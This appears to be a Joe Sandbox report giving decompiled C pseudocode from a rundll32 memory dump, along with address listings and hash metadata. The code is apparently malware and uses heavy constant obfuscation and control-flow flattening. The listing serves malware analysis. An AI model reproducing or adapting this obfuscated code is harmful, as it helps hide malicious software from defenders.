                                                                                                                                                            				_v2748 = 0x5205ca;
                                                                                                                                                            				_v2748 = _v2748 ^ 0x19402ba5;
                                                                                                                                                            				_t502 = __ecx;
                                                                                                                                                            				_t503 = 0xea1969c;
                                                                                                                                                            				_t443 = 0x43;
                                                                                                                                                            				_v2748 = _v2748 / _t443;
                                                                                                                                                            				_t444 = 0xb;
                                                                                                                                                            				_v2748 = _v2748 / _t444;
                                                                                                                                                            				_v2748 = _v2748 ^ 0x000a2456;
                                                                                                                                                            				_v2604 = 0x2f1706;
                                                                                                                                                            				_t445 = 0x26;
                                                                                                                                                            				_v2604 = _v2604 * 6;
                                                                                                                                                            				_v2604 = _v2604 ^ 0x011fcdd9;
                                                                                                                                                            				_v2684 = 0x108800;
                                                                                                                                                            				_v2684 = _v2684 >> 0xc;
                                                                                                                                                            				_v2684 = _v2684 / _t445;
                                                                                                                                                            				_v2684 = _v2684 ^ 0x00056909;
                                                                                                                                                            				_v2764 = 0x56ac6f;
                                                                                                                                                            				_v2764 = _v2764 << 0xe;
                                                                                                                                                            				_v2764 = _v2764 | 0x24a96f4c;
                                                                                                                                                            				_t446 = 0x42;
                                                                                                                                                            				_v2764 = _v2764 / _t446;
                                                                                                                                                            				_v2764 = _v2764 ^ 0x02abe6d6;
                                                                                                                                                            				_v2680 = 0xb60c61;
                                                                                                                                                            				_t447 = 0x16;
                                                                                                                                                            				_v2680 = _v2680 / _t447;
                                                                                                                                                            				_v2680 = _v2680 << 7;
                                                                                                                                                            				_v2680 = _v2680 ^ 0x04229d93;
                                                                                                                                                            				_v2712 = 0x6d1dcd;
                                                                                                                                                            				_v2712 = _v2712 | 0x18b294c6;
                                                                                                                                                            				_v2712 = _v2712 ^ 0xf88c4d23;
                                                                                                                                                            				_v2712 = _v2712 ^ 0xe07332c4;
                                                                                                                                                            				_v2612 = 0x9fb2e7;
                                                                                                                                                            				_v2612 = _v2612 | 0xd190ff6b;
                                                                                                                                                            				_v2612 = _v2612 ^ 0xd1908c6f;
                                                                                                                                                            				_v2732 = 0x85d89e;
                                                                                                                                                            				_v2732 = _v2732 << 5;
                                                                                                                                                            				_v2732 = _v2732 >> 0xd;
                                                                                                                                                            				_t448 = 0x37;
                                                                                                                                                            				_v2732 = _v2732 / _t448;
                                                                                                                                                            				_v2732 = _v2732 ^ 0x0009f3db;
                                                                                                                                                            				_v2704 = 0x8a2dac;
                                                                                                                                                            				_v2704 = _v2704 << 0xd;
                                                                                                                                                            				_v2704 = _v2704 * 6;
                                                                                                                                                            				_v2704 = _v2704 ^ 0xa2425f92;
                                                                                                                                                            				_v2620 = 0x8530c4;
                                                                                                                                                            				_v2620 = _v2620 | 0x7f36b61d;
                                                                                                                                                            				_v2620 = _v2620 ^ 0x7fb2adaf;
                                                                                                                                                            				_v2756 = 0xf61f4c;
                                                                                                                                                            				_v2756 = _v2756 >> 0xe;
                                                                                                                                                            				_t449 = 0x4b;
                                                                                                                                                            				_v2756 = _v2756 / _t449;
                                                                                                                                                            				_v2756 = _v2756 + 0xffffd188;
                                                                                                                                                            				_v2756 = _v2756 ^ 0xfff88f11;
                                                                                                                                                            				_v2660 = 0x7ee31b;
                                                                                                                                                            				_v2660 = _v2660 | 0xd8d04f1e;
                                                                                                                                                            				_v2660 = _v2660 ^ 0xd8ffeb88;
                                                                                                                                                            				_v2672 = 0xc71ff5;
                                                                                                                                                            				_v2672 = _v2672 >> 0xf;
                                                                                                                                                            				_v2672 = _v2672 ^ 0x000b63b3;
                                                                                                                                                            				_v2740 = 0x49f4c1;
                                                                                                                                                            				_t450 = 0x76;
                                                                                                                                                            				_v2740 = _v2740 * 0x4b;
                                                                                                                                                            				_v2740 = _v2740 + 0xffff254a;
                                                                                                                                                            				_v2740 = _v2740 * 0x48;
                                                                                                                                                            				_v2740 = _v2740 ^ 0x17c5e1bd;
                                                                                                                                                            				_v2652 = 0x2197ca;
                                                                                                                                                            				_v2652 = _v2652 * 0x5a;
                                                                                                                                                            				_v2652 = _v2652 ^ 0x0bc440cb;
                                                                                                                                                            				_v2720 = 0x771a3f;
                                                                                                                                                            				_v2720 = _v2720 >> 0xe;
                                                                                                                                                            				_v2720 = _v2720 + 0x9ab6;
                                                                                                                                                            				_v2720 = _v2720 ^ 0x0000c33a;
                                                                                                                                                            				_v2688 = 0x2271c;
                                                                                                                                                            				_v2688 = _v2688 / _t450;
                                                                                                                                                            				_v2688 = _v2688 << 9;
                                                                                                                                                            				_v2688 = _v2688 ^ 0x0000f5c5;
                                                                                                                                                            				_v2608 = 0xceafd9;
                                                                                                                                                            				_t451 = 0x5b;
                                                                                                                                                            				_v2608 = _v2608 / _t451;
                                                                                                                                                            				_v2608 = _v2608 ^ 0x00020c5c;
                                                                                                                                                            				_v2644 = 0x474c12;
                                                                                                                                                            				_v2644 = _v2644 + 0xffff00ab;
                                                                                                                                                            				_v2644 = _v2644 ^ 0x00446b0a;
                                                                                                                                                            				_v2760 = 0xca1d14;
                                                                                                                                                            				_t452 = 0x36;
                                                                                                                                                            				_v2760 = _v2760 / _t452;
                                                                                                                                                            				_v2760 = _v2760 ^ 0x098f5074;
                                                                                                                                                            				_v2760 = _v2760 ^ 0x8a27b7fe;
                                                                                                                                                            				_v2760 = _v2760 ^ 0x83afe7c4;
                                                                                                                                                            				_v2636 = 0x5d1272;
                                                                                                                                                            				_v2636 = _v2636 + 0xf4cf;
                                                                                                                                                            				_v2636 = _v2636 ^ 0x005057cd;
                                                                                                                                                            				_v2768 = 0x30e751;
                                                                                                                                                            				_v2768 = _v2768 | 0xcda5a365;
                                                                                                                                                            				_t453 = 5;
                                                                                                                                                            				_v2768 = _v2768 * 0x7d;
                                                                                                                                                            				_v2768 = _v2768 + 0xffff52f5;
                                                                                                                                                            				_v2768 = _v2768 ^ 0x71df24ad;
                                                                                                                                                            				_v2772 = 0x3d9f4c;
                                                                                                                                                            				_v2772 = _v2772 / _t453;
                                                                                                                                                            				_v2772 = _v2772 | 0x64d73223;
                                                                                                                                                            				_v2772 = _v2772 >> 2;
                                                                                                                                                            				_v2772 = _v2772 ^ 0x1935e4e1;
                                                                                                                                                            				_v2744 = 0xaeb35;
                                                                                                                                                            				_v2744 = _v2744 << 0x10;
                                                                                                                                                            				_v2744 = _v2744 + 0xffff2953;
                                                                                                                                                            				_v2744 = _v2744 + 0xffff82ad;
                                                                                                                                                            				_v2744 = _v2744 ^ 0xeb3966f5;
                                                                                                                                                            				_v2752 = 0x66dc67;
                                                                                                                                                            				_v2752 = _v2752 + 0x90a4;
                                                                                                                                                            				_v2752 = _v2752 + 0x6fc1;
                                                                                                                                                            				_v2752 = _v2752 ^ 0x6a9d4e17;
                                                                                                                                                            				_v2752 = _v2752 ^ 0x6af88c69;
                                                                                                                                                            				_v2716 = 0xce0c89;
                                                                                                                                                            				_v2716 = _v2716 ^ 0x42dcf22f;
                                                                                                                                                            				_v2716 = _v2716 | 0xbb0a480d;
                                                                                                                                                            				_v2716 = _v2716 ^ 0xfb186e5d;
                                                                                                                                                            				_v2616 = 0x5746b3;
                                                                                                                                                            				_v2616 = _v2616 | 0xa6a5976e;
                                                                                                                                                            				_v2616 = _v2616 ^ 0xa6f469a2;
                                                                                                                                                            				_v2708 = 0xa6d434;
                                                                                                                                                            				_v2708 = _v2708 << 0xa;
                                                                                                                                                            				_v2708 = _v2708 | 0x1b169a68;
                                                                                                                                                            				_v2708 = _v2708 ^ 0x9b5e88e0;
                                                                                                                                                            				_v2736 = 0x9f8594;
                                                                                                                                                            				_v2736 = _v2736 + 0xffffc5c7;
                                                                                                                                                            				_t454 = 9;
                                                                                                                                                            				_v2736 = _v2736 / _t454;
                                                                                                                                                            				_v2736 = _v2736 + 0xffff650c;
                                                                                                                                                            				_v2736 = _v2736 ^ 0x001c27e2;
                                                                                                                                                            				_v2668 = 0xeff616;
                                                                                                                                                            				_v2668 = _v2668 << 4;
                                                                                                                                                            				_v2668 = _v2668 ^ 0x0efcbcf0;
                                                                                                                                                            				_v2640 = 0x84564;
                                                                                                                                                            				_v2640 = _v2640 >> 9;
                                                                                                                                                            				_v2640 = _v2640 ^ 0x00099447;
                                                                                                                                                            				_v2648 = 0xb94e9c;
                                                                                                                                                            				_v2648 = _v2648 >> 7;
                                                                                                                                                            				_v2648 = _v2648 ^ 0x000c8381;
                                                                                                                                                            				_v2656 = 0x4f0029;
                                                                                                                                                            				_v2656 = _v2656 * 0x26;
                                                                                                                                                            				_v2656 = _v2656 ^ 0x0bb68559;
                                                                                                                                                            				_v2700 = 0xc64297;
                                                                                                                                                            				_v2700 = _v2700 << 0x10;
                                                                                                                                                            				_v2700 = _v2700 ^ 0xb6f38c4d;
                                                                                                                                                            				_v2700 = _v2700 ^ 0xf46a369f;
                                                                                                                                                            				_v2664 = 0x51e71d;
                                                                                                                                                            				_v2664 = _v2664 * 0xf;
                                                                                                                                                            				_v2664 = _v2664 ^ 0x04c73adc;
                                                                                                                                                            				_v2728 = 0xfedaba;
                                                                                                                                                            				_v2728 = _v2728 + 0xfffff930;
                                                                                                                                                            				_v2728 = _v2728 + 0xfffff3b0;
                                                                                                                                                            				_v2728 = _v2728 + 0xffff7b6e;
                                                                                                                                                            				_v2728 = _v2728 ^ 0x00f92d7b;
                                                                                                                                                            				_v2632 = 0xc4e34f;
                                                                                                                                                            				_t425 = _v2632 * 0x17;
                                                                                                                                                            				_v2632 = _t425;
                                                                                                                                                            				_v2632 = _v2632 ^ 0x11b64b79;
                                                                                                                                                            				_v2676 = 0x4fbb37;
                                                                                                                                                            				_v2676 = _v2676 + 0x433;
                                                                                                                                                            				_v2676 = _v2676 >> 1;
                                                                                                                                                            				_v2676 = _v2676 ^ 0x002442b0;
                                                                                                                                                            				_v2724 = 0xe01143;
                                                                                                                                                            				_v2724 = _v2724 | 0x0dc37ba2;
                                                                                                                                                            				_v2724 = _v2724 + 0xe020;
                                                                                                                                                            				_v2724 = _v2724 ^ 0x0dec213c;
                                                                                                                                                            				_v2624 = 0xd4ff52;
                                                                                                                                                            				_v2624 = _v2624 << 0xe;
                                                                                                                                                            				_v2624 = _v2624 ^ 0x3fd02267;
                                                                                                                                                            				_v2692 = 0xfd19e6;
                                                                                                                                                            				_v2692 = _v2692 + 0x8b9c;
                                                                                                                                                            				_v2692 = _v2692 | 0x5cbd23eb;
                                                                                                                                                            				_v2692 = _v2692 ^ 0x5cf129d9;
                                                                                                                                                            				while(_t503 != 0x5de06da) {
                                                                                                                                                            					if(_t503 == 0xea1969c) {
                                                                                                                                                            						_t503 = 0xfa9128f;
                                                                                                                                                            						continue;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t515 = _t503 - 0xfa9128f;
                                                                                                                                                            						if(_t503 != 0xfa9128f) {
                                                                                                                                                            							L8:
                                                                                                                                                            							__eflags = _t503 - 0xa8e801c;
                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							E0038DA22(_v2696, _v2748, _t515, _v2604,  &_v2600, _t454, _v2684);
                                                                                                                                                            							 *((short*)(E0037B6CF( &_v2600, _v2764, _v2680, _v2712))) = 0;
                                                                                                                                                            							E00378969(_v2612,  &_v1560, _t515, _v2732, _v2704);
                                                                                                                                                            							_push(_v2660);
                                                                                                                                                            							_push(_v2756);
                                                                                                                                                            							E003747CE( &_v2600, _v2672, _v2620, _v2740, _v2652, E0038DCF7(_v2620, 0x371308, _t515),  &_v1560, _v2720, _v2688);
                                                                                                                                                            							E0037A8B0(_v2608, _t437, _v2644);
                                                                                                                                                            							_t454 = _v2760;
                                                                                                                                                            							_t425 = E0037EA99(_v2760, _t502, _v2636, _v2768,  &_v2080, _v2772);
                                                                                                                                                            							_t507 =  &(_t507[0x17]);
                                                                                                                                                            							if(_t425 != 0) {
                                                                                                                                                            								_t503 = 0x5de06da;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					return _t425;
                                                                                                                                                            				}
                                                                                                                                                            				_push(_v2616);
                                                                                                                                                            				_push(_v2628);
                                                                                                                                                            				_push(_v2716);
                                                                                                                                                            				_push( &_v1040);
                                                                                                                                                            				E003846BB(_v2744, _v2752);
                                                                                                                                                            				_push(_v2668);
                                                                                                                                                            				_push(_v2736);
                                                                                                                                                            				E003747CE( &_v1040, _v2640, _v2708, _v2648, _v2656, E0038DCF7(_v2708, 0x371348, __eflags),  &_v2080, _v2700, _v2664);
                                                                                                                                                            				_t458 = _v2728;
                                                                                                                                                            				E0037A8B0(_t458, _t428, _v2632);
                                                                                                                                                            				_push(_v2692);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(_t458);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(_v2624);
                                                                                                                                                            				_t454 = _v2676;
                                                                                                                                                            				_push( &_v520);
                                                                                                                                                            				_t425 = E0037AB87(_v2676, _v2724, __eflags);
                                                                                                                                                            				_t507 = _t507 - 0xc + 0x64;
                                                                                                                                                            				_t503 = 0xa8e801c;
                                                                                                                                                            				goto L8;
                                                                                                                                                            			}



































































                                                                                                                                                            0x0037f7b0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037f6aa
                                                                                                                                                            0x0037f6aa
                                                                                                                                                            0x0037f6b0
                                                                                                                                                            0x0037f883
                                                                                                                                                            0x0037f883
                                                                                                                                                            0x0037f889
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037f6b6
                                                                                                                                                            0x0037f6d2
                                                                                                                                                            0x0037f700
                                                                                                                                                            0x0037f70a
                                                                                                                                                            0x0037f70f
                                                                                                                                                            0x0037f71b
                                                                                                                                                            0x0037f762
                                                                                                                                                            0x0037f777
                                                                                                                                                            0x0037f795
                                                                                                                                                            0x0037f799
                                                                                                                                                            0x0037f79e
                                                                                                                                                            0x0037f7a3
                                                                                                                                                            0x0037f7a9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037f7a9
                                                                                                                                                            0x0037f7a3
                                                                                                                                                            0x0037f6b0
                                                                                                                                                            0x0037f898
                                                                                                                                                            0x0037f898
                                                                                                                                                            0x0037f7ba
                                                                                                                                                            0x0037f7c8
                                                                                                                                                            0x0037f7cf
                                                                                                                                                            0x0037f7de
                                                                                                                                                            0x0037f7df
                                                                                                                                                            0x0037f7e4
                                                                                                                                                            0x0037f7f0
                                                                                                                                                            0x0037f837
                                                                                                                                                            0x0037f843
                                                                                                                                                            0x0037f849
                                                                                                                                                            0x0037f858
                                                                                                                                                            0x0037f85c
                                                                                                                                                            0x0037f85e
                                                                                                                                                            0x0037f85f
                                                                                                                                                            0x0037f861
                                                                                                                                                            0x0037f863
                                                                                                                                                            0x0037f86e
                                                                                                                                                            0x0037f875
                                                                                                                                                            0x0037f876
                                                                                                                                                            0x0037f87b
                                                                                                                                                            0x0037f87e
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: kD$)$5$<!$Q0
                                                                                                                                                            • API String ID: 0-101729813
                                                                                                                                                            • Opcode ID: ba676963f8e74b0032d976fbef9f8b6ae04bfed9c8bdfa51077958766acf7bdc
                                                                                                                                                            • Instruction ID: bb4095ed4e8b710540be08281e0e53e9594bc0405a29ebf6c3379de8fb99d79e
                                                                                                                                                            • Opcode Fuzzy Hash: ba676963f8e74b0032d976fbef9f8b6ae04bfed9c8bdfa51077958766acf7bdc
                                                                                                                                                            • Instruction Fuzzy Hash: 3F1201715083809FD3A9CF21C48AA4BFBE2FBC5758F50891DE5D98A260D7B58949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E003866CA() {
                                                                                                                                                            				char _v520;
                                                                                                                                                            				char _v1040;
                                                                                                                                                            				signed int _v1044;
                                                                                                                                                            				intOrPtr _v1048;
                                                                                                                                                            				intOrPtr _v1052;
                                                                                                                                                            				intOrPtr _v1056;
                                                                                                                                                            				unsigned int _v1060;
                                                                                                                                                            				signed int _v1064;
                                                                                                                                                            				signed int _v1068;
                                                                                                                                                            				signed int _v1072;
                                                                                                                                                            				signed int _v1076;
                                                                                                                                                            				signed int _v1080;
                                                                                                                                                            				signed int _v1084;
                                                                                                                                                            				signed int _v1088;
                                                                                                                                                            				signed int _v1092;
                                                                                                                                                            				signed int _v1096;
                                                                                                                                                            				signed int _v1100;
                                                                                                                                                            				signed int _v1104;
                                                                                                                                                            				signed int _v1108;
                                                                                                                                                            				signed int _v1112;
                                                                                                                                                            				signed int _v1116;
                                                                                                                                                            				signed int _v1120;
                                                                                                                                                            				signed int _v1124;
                                                                                                                                                            				signed int _v1128;
                                                                                                                                                            				signed int _v1132;
                                                                                                                                                            				signed int _v1136;
                                                                                                                                                            				signed int _v1140;
                                                                                                                                                            				signed int _v1144;
                                                                                                                                                            				signed int _v1148;
                                                                                                                                                            				signed int _v1152;
                                                                                                                                                            				signed int _v1156;
                                                                                                                                                            				signed int _v1160;
                                                                                                                                                            				signed int _v1164;
                                                                                                                                                            				void* _t263;
                                                                                                                                                            				void* _t264;
                                                                                                                                                            				intOrPtr _t265;
                                                                                                                                                            				void* _t268;
                                                                                                                                                            				void* _t269;
                                                                                                                                                            				signed int _t272;
                                                                                                                                                            				signed int _t273;
                                                                                                                                                            				signed int _t274;
                                                                                                                                                            				signed int _t275;
                                                                                                                                                            				intOrPtr _t282;
                                                                                                                                                            				intOrPtr _t289;
                                                                                                                                                            				intOrPtr _t306;
                                                                                                                                                            				void* _t310;
                                                                                                                                                            				signed int* _t314;
                                                                                                                                                            
                                                                                                                                                            				_t314 =  &_v1164;
                                                                                                                                                            				_v1044 = _v1044 & 0x00000000;
                                                                                                                                                            				_v1056 = 0xc409ba;
                                                                                                                                                            				_v1052 = 0xa85c92;
                                                                                                                                                            				_v1048 = 0x441ffc;
                                                                                                                                                            				_v1160 = 0xafc02f;
                                                                                                                                                            				_v1160 = _v1160 + 0xffff4fb0;
                                                                                                                                                            				_v1160 = _v1160 + 0x85f3;
                                                                                                                                                            				_t272 = 0x2a;
                                                                                                                                                            				_v1160 = _v1160 / _t272;
                                                                                                                                                            				_v1160 = _v1160 ^ 0x000b1184;
                                                                                                                                                            				_t310 = 0xb516bbb;
                                                                                                                                                            				_v1060 = 0xeb49a4;
                                                                                                                                                            				_v1060 = _v1060 >> 5;
                                                                                                                                                            				_v1060 = _v1060 ^ 0x00095d90;
                                                                                                                                                            				_v1136 = 0x74fb0a;
                                                                                                                                                            				_t273 = 0x7f;
                                                                                                                                                            				_v1136 = _v1136 * 0x1e;
                                                                                                                                                            				_v1136 = _v1136 ^ 0x978de9ec;
                                                                                                                                                            				_v1136 = _v1136 ^ 0xad10b4f2;
                                                                                                                                                            				_v1136 = _v1136 ^ 0x372b3a8e;
                                                                                                                                                            				_v1152 = 0xb92c6e;
                                                                                                                                                            				_v1152 = _v1152 ^ 0x0e0e3092;
                                                                                                                                                            				_v1152 = _v1152 | 0x72fa6aba;
                                                                                                                                                            				_v1152 = _v1152 + 0xffff103c;
                                                                                                                                                            				_v1152 = _v1152 ^ 0x7efa5fdf;
                                                                                                                                                            				_v1128 = 0x794cf8;
                                                                                                                                                            				_v1128 = _v1128 ^ 0x9a366bfc;
                                                                                                                                                            				_v1128 = _v1128 + 0xde36;
                                                                                                                                                            				_v1128 = _v1128 ^ 0x5c71c30d;
                                                                                                                                                            				_v1128 = _v1128 ^ 0xc6263e62;
                                                                                                                                                            				_v1156 = 0x79c02;
                                                                                                                                                            				_v1156 = _v1156 + 0xfffffb46;
                                                                                                                                                            				_v1156 = _v1156 | 0x060cf66c;
                                                                                                                                                            				_v1156 = _v1156 ^ 0x799dfdb7;
                                                                                                                                                            				_v1156 = _v1156 ^ 0x7f9bfbef;
                                                                                                                                                            				_v1164 = 0xbfcf15;
                                                                                                                                                            				_v1164 = _v1164 >> 3;
                                                                                                                                                            				_v1164 = _v1164 << 0xc;
                                                                                                                                                            				_v1164 = _v1164 << 3;
                                                                                                                                                            				_v1164 = _v1164 ^ 0xfcf89fe4;
                                                                                                                                                            				_v1112 = 0xe0c8d1;
                                                                                                                                                            				_v1112 = _v1112 ^ 0xbad245c5;
                                                                                                                                                            				_v1112 = _v1112 << 5;
                                                                                                                                                            				_v1112 = _v1112 ^ 0x4653cc84;
                                                                                                                                                            				_v1116 = 0x38a8e4;
                                                                                                                                                            				_v1116 = _v1116 + 0xffff2cc2;
                                                                                                                                                            				_v1116 = _v1116 + 0x453c;
                                                                                                                                                            				_v1116 = _v1116 ^ 0x0030e111;
                                                                                                                                                            				_v1144 = 0x8706d;
                                                                                                                                                            				_v1144 = _v1144 | 0x44a168a8;
                                                                                                                                                            				_v1144 = _v1144 * 0x4d;
                                                                                                                                                            				_v1144 = _v1144 >> 0x10;
                                                                                                                                                            				_v1144 = _v1144 ^ 0x0002b082;
                                                                                                                                                            				_v1068 = 0x3ad283;
                                                                                                                                                            				_v1068 = _v1068 + 0xc4d8;
                                                                                                                                                            				_v1068 = _v1068 ^ 0x003ad5e6;
                                                                                                                                                            				_v1148 = 0xbbdd96;
                                                                                                                                                            				_v1148 = _v1148 / _t273;
                                                                                                                                                            				_v1148 = _v1148 + 0xffff10a8;
                                                                                                                                                            				_v1148 = _v1148 + 0xdbb9;
                                                                                                                                                            				_v1148 = _v1148 ^ 0x00089235;
                                                                                                                                                            				_v1084 = 0xf8cace;
                                                                                                                                                            				_v1084 = _v1084 ^ 0x230d76f6;
                                                                                                                                                            				_v1084 = _v1084 ^ 0x23f29212;
                                                                                                                                                            				_v1140 = 0x18cea;
                                                                                                                                                            				_v1140 = _v1140 << 3;
                                                                                                                                                            				_v1140 = _v1140 << 0xa;
                                                                                                                                                            				_v1140 = _v1140 + 0xffff66c6;
                                                                                                                                                            				_v1140 = _v1140 ^ 0x3196ba0a;
                                                                                                                                                            				_v1104 = 0x64ea4d;
                                                                                                                                                            				_v1104 = _v1104 >> 0xe;
                                                                                                                                                            				_v1104 = _v1104 << 0x10;
                                                                                                                                                            				_v1104 = _v1104 ^ 0x01951052;
                                                                                                                                                            				_v1120 = 0x40e961;
                                                                                                                                                            				_v1120 = _v1120 ^ 0xb7fb83c2;
                                                                                                                                                            				_v1120 = _v1120 + 0xb75e;
                                                                                                                                                            				_v1120 = _v1120 ^ 0xb7bbc099;
                                                                                                                                                            				_v1096 = 0x7779e0;
                                                                                                                                                            				_v1096 = _v1096 | 0x86983bb4;
                                                                                                                                                            				_v1096 = _v1096 ^ 0x86f0c1f2;
                                                                                                                                                            				_v1100 = 0xda5543;
                                                                                                                                                            				_v1100 = _v1100 + 0xffff2368;
                                                                                                                                                            				_v1100 = _v1100 + 0xffff6302;
                                                                                                                                                            				_v1100 = _v1100 ^ 0x00d61d50;
                                                                                                                                                            				_v1132 = 0x843ae5;
                                                                                                                                                            				_v1132 = _v1132 + 0xae05;
                                                                                                                                                            				_v1132 = _v1132 >> 9;
                                                                                                                                                            				_v1132 = _v1132 | 0xb52a1de5;
                                                                                                                                                            				_v1132 = _v1132 ^ 0xb5269cc0;
                                                                                                                                                            				_v1064 = 0x4bdca1;
                                                                                                                                                            				_t274 = 0x36;
                                                                                                                                                            				_v1064 = _v1064 * 0x2d;
                                                                                                                                                            				_v1064 = _v1064 ^ 0x0d50802d;
                                                                                                                                                            				_v1076 = 0xc70263;
                                                                                                                                                            				_v1076 = _v1076 ^ 0xed1c16c4;
                                                                                                                                                            				_v1076 = _v1076 ^ 0xeddf4f32;
                                                                                                                                                            				_v1108 = 0x3676a5;
                                                                                                                                                            				_v1108 = _v1108 << 0x10;
                                                                                                                                                            				_v1108 = _v1108 << 8;
                                                                                                                                                            				_v1108 = _v1108 ^ 0xa501f64e;
                                                                                                                                                            				_v1088 = 0x1a5bc1;
                                                                                                                                                            				_v1088 = _v1088 / _t274;
                                                                                                                                                            				_v1088 = _v1088 ^ 0x00023ab9;
                                                                                                                                                            				_v1092 = 0xcce8ca;
                                                                                                                                                            				_v1092 = _v1092 + 0xffff41cd;
                                                                                                                                                            				_v1092 = _v1092 ^ 0x00c96fdb;
                                                                                                                                                            				_v1072 = 0x26dee9;
                                                                                                                                                            				_t275 = 0x31;
                                                                                                                                                            				_v1072 = _v1072 * 0x7c;
                                                                                                                                                            				_v1072 = _v1072 ^ 0x12da7d33;
                                                                                                                                                            				_v1124 = 0xc51f8;
                                                                                                                                                            				_v1124 = _v1124 * 0x7c;
                                                                                                                                                            				_v1124 = _v1124 | 0x22e20644;
                                                                                                                                                            				_v1124 = _v1124 + 0xffff053d;
                                                                                                                                                            				_v1124 = _v1124 ^ 0x27f3e63a;
                                                                                                                                                            				_v1080 = 0x33633f;
                                                                                                                                                            				_v1080 = _v1080 / _t275;
                                                                                                                                                            				_v1080 = _v1080 ^ 0x000716b7;
                                                                                                                                                            				E00385C73(_t275);
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t310 != 0xc63ed) {
                                                                                                                                                            						if(_t310 == 0x5b9c87d) {
                                                                                                                                                            							_push(_v1104);
                                                                                                                                                            							_push(_v1140);
                                                                                                                                                            							_t263 = E0038DCF7(_v1084, 0x371060, __eflags);
                                                                                                                                                            							_t264 = E0038D25E(_v1120);
                                                                                                                                                            							_t282 =  *0x393e10; // 0x0
                                                                                                                                                            							_t265 =  *0x393e10; // 0x0
                                                                                                                                                            							E0038453F(_v1100, __eflags, _v1132, _t263, _v1064, _t265 + 0x23c, _t282 + 0x1c, _v1076, _v1108, _t264, _t282 + 0x1c);
                                                                                                                                                            							_t268 = E0037A8B0(_v1088, _t263, _v1092);
                                                                                                                                                            							_t314 =  &(_t314[0xa]);
                                                                                                                                                            							_t310 = 0xc63ed;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t310 == 0xb516bbb) {
                                                                                                                                                            								_t310 = 0xc84e726;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t319 = _t310 - 0xc84e726;
                                                                                                                                                            								if(_t310 == 0xc84e726) {
                                                                                                                                                            									_push(_v1128);
                                                                                                                                                            									_push(_v1152);
                                                                                                                                                            									_t269 = E0038DCF7(_v1136, 0x371000, _t319);
                                                                                                                                                            									_t289 =  *0x393e10; // 0x0
                                                                                                                                                            									_t306 =  *0x393e10; // 0x0
                                                                                                                                                            									E003747CE(_t306 + 0x23c, _v1156, _t289 + 0x1c, _v1164, _v1112, _t269, _t289 + 0x1c, _v1116, _v1144);
                                                                                                                                                            									_t268 = E0037A8B0(_v1068, _t269, _v1148);
                                                                                                                                                            									_t314 =  &(_t314[9]);
                                                                                                                                                            									_t310 = 0x5b9c87d;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L9;
                                                                                                                                                            					}
                                                                                                                                                            					_push(_v1080);
                                                                                                                                                            					_push( &_v1040);
                                                                                                                                                            					_push(_v1124);
                                                                                                                                                            					E003913AD(_v1072,  &_v520, __eflags);
                                                                                                                                                            					_t314 =  &(_t314[3]);
                                                                                                                                                            					_t310 = 0xafb2886;
                                                                                                                                                            					L9:
                                                                                                                                                            					__eflags = _t310 - 0xafb2886;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				return _t268;
                                                                                                                                                            			}


















































                                                                                                                                                            0x003868f2
                                                                                                                                                            0x003868fa
                                                                                                                                                            0x00386902
                                                                                                                                                            0x0038690a
                                                                                                                                                            0x00386912
                                                                                                                                                            0x0038691a
                                                                                                                                                            0x00386922
                                                                                                                                                            0x0038692a
                                                                                                                                                            0x00386932
                                                                                                                                                            0x0038693a
                                                                                                                                                            0x00386942
                                                                                                                                                            0x0038694a
                                                                                                                                                            0x00386952
                                                                                                                                                            0x0038695a
                                                                                                                                                            0x00386962
                                                                                                                                                            0x00386967
                                                                                                                                                            0x0038696f
                                                                                                                                                            0x00386977
                                                                                                                                                            0x00386986
                                                                                                                                                            0x00386989
                                                                                                                                                            0x0038698d
                                                                                                                                                            0x00386995
                                                                                                                                                            0x0038699d
                                                                                                                                                            0x003869a5
                                                                                                                                                            0x003869ad
                                                                                                                                                            0x003869b5
                                                                                                                                                            0x003869ba
                                                                                                                                                            0x003869bf
                                                                                                                                                            0x003869c7
                                                                                                                                                            0x003869d7
                                                                                                                                                            0x003869db
                                                                                                                                                            0x003869e3
                                                                                                                                                            0x003869eb
                                                                                                                                                            0x003869f3
                                                                                                                                                            0x003869fb
                                                                                                                                                            0x00386a08
                                                                                                                                                            0x00386a09
                                                                                                                                                            0x00386a0d
                                                                                                                                                            0x00386a15
                                                                                                                                                            0x00386a22
                                                                                                                                                            0x00386a26
                                                                                                                                                            0x00386a2e
                                                                                                                                                            0x00386a36
                                                                                                                                                            0x00386a3e
                                                                                                                                                            0x00386a4c
                                                                                                                                                            0x00386a50
                                                                                                                                                            0x00386a60
                                                                                                                                                            0x00386a74
                                                                                                                                                            0x00386a74
                                                                                                                                                            0x00386a82
                                                                                                                                                            0x00386b0d
                                                                                                                                                            0x00386b16
